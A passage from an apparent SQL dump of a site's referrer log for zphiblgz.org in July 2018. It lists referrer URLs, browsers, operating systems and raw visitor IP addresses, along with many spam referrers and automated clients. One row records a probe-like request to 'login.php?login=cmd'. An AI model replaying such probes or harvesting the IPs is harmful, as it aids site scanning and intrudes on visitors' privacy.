mktYVQtMHFCSnE4SlBCZ01LRWNBaTFnd09wcHlYdlJ2Zyws&sign=1b72b043bd4610715c2584b7476b4824&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.203.45.158','000',2,0),(32729,'2018-07-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1839.JL5M9zyOHPr-tSOjFV1mR1LHLY67_oLlGUAdwGwYxRY.93230a7a1076c855dbf0573f04fec76a8fd3b167&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041MndhaUNWWlZUNGJFTzBaRGtTMF9saEo0NHpod3drZHZPUVlzSThhb3dsQSws&sign=a85a607b2cbd176413b74efebde669b9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.110.152','000',2,0),(32730,'2018-07-05','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1839.ekF6N4PHYld7dshZmoip6o2S5tEe9B_ylkurkH5YLes.123d3a5211eae61e25c08f9b6bafded175fbab6d&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NmtSSXVlRmUzM2doWTBoLUUxMlEyb01DT0JkcFpSS0J5ZGxqWEdwTHJKQSws&sign=c9fbb64b50a353b4fc2f7bc875173da5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.147.194','000',2,0),(32731,'2018-07-05','http://mobile.regionshop.biz/','Unknown','Unknown','Unknown','','178.137.83.231','000',2,0),(32732,'2018-07-05','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(32733,'2018-07-05','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','193.201.225.45','000',1,0),(32734,'2018-07-05','https://zphiblgz.org','Chrome','Windows','66.0.3359.181','','37.187.129.166','000',1,0),(32735,'2018-07-05','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','199.66.201.19','000',2,0),(32736,'2018-07-05','https://dawlenie.com/','MSIE','Windows','6.0','','46.119.121.187','000',1,0),(32737,'2018-07-05','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.178.103','000',1,0),(32738,'2018-07-05','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.165','000',2,0),(32739,'2018-07-05','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.35','000',2,0),(32740,'2018-07-05','http://prostitutki-spb.spb.ru/','MSIE','Windows','6.0','','46.119.115.156','000',2,0),(32741,'2018-07-05','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(32742,'2018-07-05','https://vzheludke.com/','MSIE','Windows','6.0','','176.8.89.165','000',2,0),(32743,'2018-07-05','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',18,0),(32744,'2018-07-05','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(32745,'2018-07-05','https://zphiblgz.org','Firefox','Linux','50.0','','149.202.72.198','000',2,0),(32746,'2018-07-05','https://www.souvenirua.com/uk/','Opera','Windows','8.01','','46.119.121.187','000',1,0),(32747,'2018-07-05','https://zphiblgz.org','Firefox','Windows','40.1','','189.174.71.77','000',2,0),(32748,'2018-07-05','http://kino2018.cc/','MSIE','Windows','6.0','','178.137.83.231','000',2,0),(32749,'2018-07-05','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(32750,'2018-07-05','https://zphiblgz.org','libwww-perl','Unknown','6.29','','185.229.225.139','000',40,0),(32751,'2018-07-05','http://www.rospromtest.ru/','Unknown','Unknown','Unknown','','46.119.121.187','000',1,0),(32752,'2018-07-05','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32753,'2018-07-05','https://zphiblgz.org/history/','Edge','Windows','17.17134','','76.187.2.186','000',1,0),(32754,'2018-07-05','74.220.219.51','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(32755,'2018-07-05','https://zphiblgz.org','Firefox','Windows','40.1','','27.5.127.221','000',2,0),(32756,'2018-07-05','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','209.250.231.61','000',2,0),(32757,'2018-07-05','https://www.google.com/','Safari','iPhone','11.0','','174.218.2.204','000',2,0),(32758,'2018-07-06','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.28','000',1,0),(32759,'2018-07-06','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(32760,'2018-07-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(32761,'2018-07-06','https://russian-postindex.ru/','MSIE','Windows','6.0','','46.185.119.21','000',6,0),(32762,'2018-07-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1840.pqIrHJRFS9Hls072_KodQJRA0x4phP5qYfQvAax_88U.049b2407cb3b2e4ed76309c1de06105b11a5a7c0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040QUdNMFcyLVlQZUZaSHZ6ejFWSjFzUUgzYkpwVjVqTDdkYkVxQ2hvUUZ6Zyws&sign=4098ebab7a17982d0acc711fcbc975e5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.122.69','000',2,0),(32763,'2018-07-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','107.6.150.242','000',2,0),(32764,'2018-07-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1840.cqXHxIpFUCjINLwZd_XIjy3V2WYuBJItjsbxldGixb0.2b906f11251b4db7e69a2e66fb34b21613680918&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042R0Zsam5fQ2JfSlhPSEFCbFRYNlJEZFB2M2lJVnZ4NzgwUkVqa0hoTVp2dyws&sign=f90b6861c96db15fa4db3501503f24d1&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.94.227','000',2,0),(32765,'2018-07-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1840.Lsaa90h4fiuOskQj6dGOqYqKX1dDz9YwlrbKLpp4icU.0091f0ddfb3f4844050016a442aa4311fa55536e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042U3BpdjdtenBaUUJCUzY2QW9WWmdtbzhYNjZFTmx2YlEyRzI1ZjZ6TGlvZyws&sign=76d83d189442659ae43b91aa4496e593&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.1.247','000',2,0),(32766,'2018-07-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1840.jZkhNcBoN4TJXOkiQr4ZB8ue18SnQcKWv2PB7X7kMoQ.12ed9b8a34d9f620151ede7092f151c6accfaccf&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040enBtdzRSRnoxdDF0SU5OR3NndnAtYXZVTkdCd2FLdUtRdGJLN051YnJjdyws&sign=4a31dfaa6476ba683a560ee0ad86b191&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.157.168','000',2,0),(32767,'2018-07-06','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1840.zZS2jYqBjGVPRs_-mvjz-BFpQHf6dY6xypSBxdiYuDc.bb579bd15a640e47ec912a8df4f696ad8e22e9a5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042WXh6Vko2cmpsQXNMZGEzdWdCeUxoQlZ1b3Z6TUxDeF9jMXZILUFFOTY5USws&sign=75461b731801509faacbd7303375ad93&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.35.64','000',2,0),(32768,'2018-07-06','https://zphiblgz.org/','Firefox','Windows','32.1','','149.202.86.188','000',2,0),(32769,'2018-07-06','http://zphiblgz.org/','Edge','Macintosh','34.63882','','193.201.224.223','000',2,0),(32770,'2018-07-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(32771,'2018-07-06','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.28','000',1,0),(32772,'2018-07-06','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.28','000',1,0),(32773,'2018-07-06','http://yandex.ru/yandsearch?text=https://yandex.ru/clck/jsredir%3Ffrom%3Dyandex.ru%253Bsearch%253Bweb%253B%253B%26text%3D%26etext%3D1841.0sWM7gF5XWW_egUCI6wTYn5mxR8weRz4s18geK1VghC6oTILPYerNoiD1fl_O-ld.c200933b615a3610c71ad22cd1399a659f7601f0%26uuid%3D%26state%3D_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YHRNgn3KsbHJbmUkku86_mY%26data%3DUlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxYZ2xsMVE0RVN0Y3pVYlEyemF2QU5QdVVsNDJGNlBqMVFYZGtRazlyVi16c0kybW15V21mTWJqTjhBdlpVNE1PWmVtRDg0bnhIM01MMFBEV1k5SDRLUQ%26b64e%3D2%26sign%3D52f14246954567d2faacd9ca39f085a6%26keyno%3D0%26cst%3DAiuY0DBWFJ7IXge4WdYJQa9gkHE_3kbiWvuSvIkCIhOt5D74cfGufbbk7I8MJigyqjwmIfKiOAvzLJ35vtzDOWZtPi9ix3_nHEuF2Xc_9DbKyH8J2f2wcdTbUhACUxafue9JozDNxgyydr56XC4fIQ%26ref%3DorjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aINm7uUtRXdHkR8zpLHlccSZ14lBA4aLgdHsQdxhu-dCPy040m7Sl13qOVqaca1KXJQ%26l10n%3Dru%26cts%3D1530876406552%26mc%3D7.19512729506&lr=213','MSIE','Windows','8.0','','176.195.103.49','000',2,0),(32774,'2018-07-06','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(32775,'2018-07-06','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(32776,'2018-07-06','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0ahUKEwi4oaPftYrcAhXpx1kKHWuuB1AQFghTMAY&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','76.104.109.134','000',13,0),(32777,'2018-07-06','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','46.119.115.156','000',1,0),(32778,'2018-07-06','https://zphiblgz.org/service/','AppleWebKit','Windows','534','','40.77.190.89','000',1,0),(32779,'2018-07-06','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.190.145','000',1,0),(32780,'2018-07-06','https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1841.S3ZPJC3AzT17YlWJ6pqDDpZV8sAXzSZk5sscE5Rw4BFAmLX-VjsvwYJ7OjJ7Txke.0495c1e82ba1c4a0cd87dc3c5b66a0620e0221e2&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YD4hgzqAYr5iuWBiLZQy-rY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2tLa3dNcl9YeW90S253bzk3RmhNWlNzb25WX2pnSEZsWmc2VUh1VzdNd2ZrN2FlNHVLTFVieFhxNVBrMlFNX2ZlQzNvSUJOSmlCOEFpQndBb0lFOWIyRkxzOGdEeFBZVQ&b64e=2&sign=50c25731376b5715654b851481b11f33&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FImkNTfYzQPrhQyoDCBjq1nxb6K-HZuhB3itxn42YPHlUUWmY7OVb4drgt-DIYMaT5FD-YrOfSVVcjJ9Z9lW1rRg7S3tGw9KwVL97pvb32_J_aacQ49FV6w&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocP49Aq4Ni8D95Va2SW1C6I1SEgGAExJUExXHEUdZW0Vubi_oP_qeiaXyGDEtw_fWFrg&l10n=ru&cts=1530880073134&mc=6.25771081143','MSIE','Windows','8.0','','85.91.192.117','000',1,0),(32781,'2018-07-06','http://udav.net/','Unknown','Unknown','Unknown','','178.137.83.231','000',2,0),(32782,'2018-07-06','https://documentserver.net/','Opera','Windows','6.0','','178.137.83.231','000',2,0),(32783,'2018-07-06','http://shnyagi.net/','Opera','Windows','6.01','','46.119.121.187','000',2,0),(32784,'2018-07-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.28','000',2,0),(32785,'2018-07-06','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(32786,'2018-07-06','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.27','000',1,0),(32787,'2018-07-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',2,0),(32788,'2018-07-06','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.177.68','000',1,0),(32789,'2018-07-06','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(32790,'2018-07-06','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(32791,'2018-07-06','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(32792,'2018-07-06','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','88.198.90.9','000',1,0),(32793,'2018-07-06','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.21','000',2,0),(32794,'2018-07-06','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(32795,'2018-07-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','115.238.55.24','000',2,0),(32796,'2018-07-06','https://zphiblgz.org','Chrome','Windows','66.0.3359.117','','96.127.158.237','000',1,0),(32797,'2018-07-06','https://www.google.com/','Safari','iPhone','11.0','','66.87.134.183','000',2,0),(32798,'2018-07-06','https://zphiblgz.org','python-requests','Unknown','2.9.1','','188.166.34.95','000',1,0),(32799,'2018-07-06','https://zphiblgz.org','Firefox','Windows','56.0','','92.222.39.223','000',3,0),(32800,'2018-07-06','http://pornoelita.info/','Opera','Windows','9.01','','176.8.89.165','000',3,0),(32801,'2018-07-06','https://www.google.co.in/search?client=ucweb-mini-b-bookmark&q=yerpedu+mandalam+zphi+school+10th&oq=yerpedu+mandalam+zphi+school+10th&aqs=mobile-gws-lite..','Chrome','Android','38.0.1025.166','','66.102.6.220','000',1,0),(32802,'2018-07-06','https://zphiblgz.org','Chrome','Android','38.0.1025.166','','66.102.6.222','000',1,0),(32803,'2018-07-06','https://zphiblgz.org/','Firefox','Windows','41.0','','46.161.9.18','000',3,0),(32804,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.208','000',4,0),(32805,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.199','000',3,0),(32806,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.202','000',2,0),(32807,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.218','000',2,0),(32808,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.215','000',2,0),(32809,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.195','000',1,0),(32810,'2018-07-06','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','95.213.224.209','000',1,0),(32811,'2018-07-06','https://zphiblgz.org/history/','Edge','Windows','17.17134','','76.187.2.186','000',1,0),(32812,'2018-07-06','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','52.53.201.78','000',2,0),(32813,'2018-07-06','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.188.216','000',1,0),(32814,'2018-07-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','104.196.222.94','000',2,0),(32815,'2018-07-06','http://zphiblgz.org/','Safari','Linux','534.34','','104.196.222.94','000',1,0),(32816,'2018-07-06','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','139.59.168.254','000',2,0),(32817,'2018-07-07','http://jjbabskoe.ru/','Opera','Windows','9.0','','46.119.115.156','000',2,0),(32818,'2018-07-07','https://ogorodnic.com/','MSIE','Windows','6.0','','176.8.89.165','000',2,0),(32819,'2018-07-07','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(32820,'2018-07-07','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(32821,'2018-07-07','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.28','000',1,0),(32822,'2018-07-07','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(32823,'2018-07-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','35.196.64.174','000',5,0),(32824,'2018-07-07','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.32','000',1,0),(32825,'2018-07-07','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',1,0),(32826,'2018-07-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1841.P5tBBfiOzx_WSUUdPmdi0-WwosO6ZY_sLaO-f-MrqWA.9ed1e3e44c47d88621599a12315e241e54d33314&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042TmpSb3dVOVNPVW1UcGs3QzRlckprWkMwWC1CQlBEWjI4OEJnVWFWVjhNQSws&sign=a5c5eb1705460e50da88905f5af132fb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','52.58.155.179','000',2,0),(32827,'2018-07-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1841.Yot-ep4_aGid5NJ4THWpiRl6AQmPSzyrdzzH5M0j15Y.84ae261c31f60c07f83e78760fc1d83b6fa00e72&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QnF4ckZ4ME9nb2NTanFYYWRiX1BsclNjMUdMeVN3a3lhN2FhUENsMUhOQSws&sign=496d6e41194645ce8b196eceb75da38c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.218.151','000',2,0),(32828,'2018-07-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1841.H9LbuEOonFJGOv8XhxrV0UxDr69neo6jeKRZb_LbvTs.987a998458e600940fcedd0f7671befe25ea1d56&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043b2cyVWZjdFdYQjJVa3l5Rm15U20xZWZBLWJ2eGJjbU5vUVpYVGtSOWdyQSws&sign=6f2269670961780e2b08812c9f7b501e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.175.32','000',2,0),(32829,'2018-07-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1841.Tl0R7wFvKkJ-sZiUm0WYzGMdGnSXAlBhM_-r9jkn990.46855f186a625b06971dad44fe82a69554b10752&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040SWRNUmhhU1Vodlp1bGJRN3NvZUd6U20ta25CaVNSNDB3LWlIc2RuUXRsZyws&sign=1c7db71430d2a760d4744cfa970f82e3&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.122.69','000',2,0),(32830,'2018-07-07','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1841.1svQ84jQXLmyVqt1RnTyB6f619mg6EuuqUukfFVf0ok.8eb7cf88f9dab90004b1867c9aef8d7785a7d816&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041QU4zbjM0Q3EwRXcwamVUaE40OFRCMkRCbm00a1hXaXJUdkNxRXRxWF9lZyws&sign=768588790043ac2828b4f0c4e86e7d57&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.226.44','000',2,0),(32831,'2018-07-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(32832,'2018-07-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','115.238.55.23','000',1,0),(32833,'2018-07-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','60.12.225.165','000',1,0),(32834,'2018-07-07','https://zphiblgz.org','Python-urllib','Unknown','2.7','','115.84.112.122','000',1,0),(32835,'2018-07-07','http://www.zphiblgz.org','Chrome','Linux','65.0.3325.181','','104.236.99.28','000',1,0),(32836,'2018-07-07','https://zphiblgz.org/','Firefox','Windows','52.0','','149.202.86.188','000',2,0),(32837,'2018-07-07','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(32838,'2018-07-07','https://zphiblgz.org','Firefox','Windows','52.0','','45.33.72.115','000',1,0),(32839,'2018-07-07','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.30','000',2,0),(32840,'2018-07-07','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(32841,'2018-07-07','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(32842,'2018-07-07','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.27','000',1,0),(32843,'2018-07-07','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.57.233.99','000',2,0),(32844,'2018-07-07','https://zphiblgz.org','Edge','Unknown','AI','','64.62.252.163','000',1,0),(32845,'2018-07-07','https://www.google.com/','Chrome','Macintosh','67.0.3396.79','','69.143.100.166','000',8,0),(32846,'2018-07-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',4,0),(32847,'2018-07-07','https://ww2awards.info/','Opera','Windows','7.54','','178.137.83.231','000',2,0),(32848,'2018-07-07','https://zphiblgz.org','MSIE','Windows','11.0','','188.240.208.26','000',2,0),(32849,'2018-07-07','https://zphiblgz.org/ts_teams/tamika-r-daniels/','AppleWebKit','Windows','534','','199.30.25.66','000',1,0),(32850,'2018-07-07','https://www.bing.com/','Silk','Kindle Fire','67.4.1','','71.244.254.38','000',12,0),(32851,'2018-07-07','http://viagra-soft.ru/','MSIE','Windows','6.0','','178.137.89.148','000',8,0),(32852,'2018-07-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(32853,'2018-07-07','http://search.aol.com/aol/search?q=zphiblgz.org&v_t=keyword_rollover&s_cs=-4851822306737969872&s_it=botm_grelsearch','Chrome','Windows','35.0.1916.153','','185.4.65.44','000',2,0),(32854,'2018-07-07','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','18.236.171.152','000',2,0),(32855,'2018-07-07','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.236','000',1,0),(32856,'2018-07-07','https://zphiblgz.org/scholarship/soror-conway1/','AppleWebKit','Windows','534','','40.77.178.122','000',1,0),(32857,'2018-07-07','http://prostitutki-spb.spb.ru/','MSIE','Windows','6.0','','46.119.115.156','000',3,0),(32858,'2018-07-07','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(32859,'2018-07-07','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','80.85.86.76','000',2,0),(32860,'2018-07-08','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(32861,'2018-07-08','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(32862,'2018-07-08','http://xn--d1abj0abs9d.in.ua/','MSIE','Windows','6.0','','46.119.115.156','000',5,0),(32863,'2018-07-08','http://www.zphiblgz.org/login.php?login=cmd','Chrome','Windows','42.0.2311.152','','69.12.66.247','000',2,0),(32864,'2018-07-08','https://zphiblgz.org','Firefox','Windows','38.0','','195.22.127.227','000',2,0),(32865,'2018-07-08','http://zphiblgz.org/download/aarc/','Opera Next','Windows','49.0.2725.47','','195.184.208.196','000',2,0),(32866,'2018-07-08','https://zphiblgz.org','python-requests','Unknown','2.18.4','','195.181.172.173','000',1,0),(32867,'2018-07-08','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',2,0),(32868,'2018-07-08','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(32869,'2018-07-08','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.28','000',1,0),(32870,'2018-07-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1842.2W8f4a8j30qFDpoBvHb7pQNJFnsgOyAWMFA88obUuLc.edb088c9085971e5f0a5f91aabffc776f45caf93&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043NWotWkhOZ3Uwdk10NXhnYXJueWJRN25EU2RwNGVoMEpreFlPYkRxX1hQQSws&sign=5359211814de9a6c91f526c0c846a511&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','83.136.250.42','000',2,0),(32871,'2018-07-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1842.IZjlVPY9PGoa4r7bTY6jwvDnMzog1QG70269m26emcI.c56d3f936af426090a4b08e078628c37bdee9352&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d1NRd2RTZDYyTktVeEUtTFNQUnZYWDhETk1IOEN2QzdvZjdhYXZJSGFJUSws&sign=a23e4660e0d727bbd2a363db276ca854&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.249.85','000',2,0),(32872,'2018-07-08','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1842.WvEQo6MV3Q4Bf4y7EAZIgo7__PbJWjbesb7sq25THXw.9dd66703e0726137d840c1d433705c5ee200eee1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXS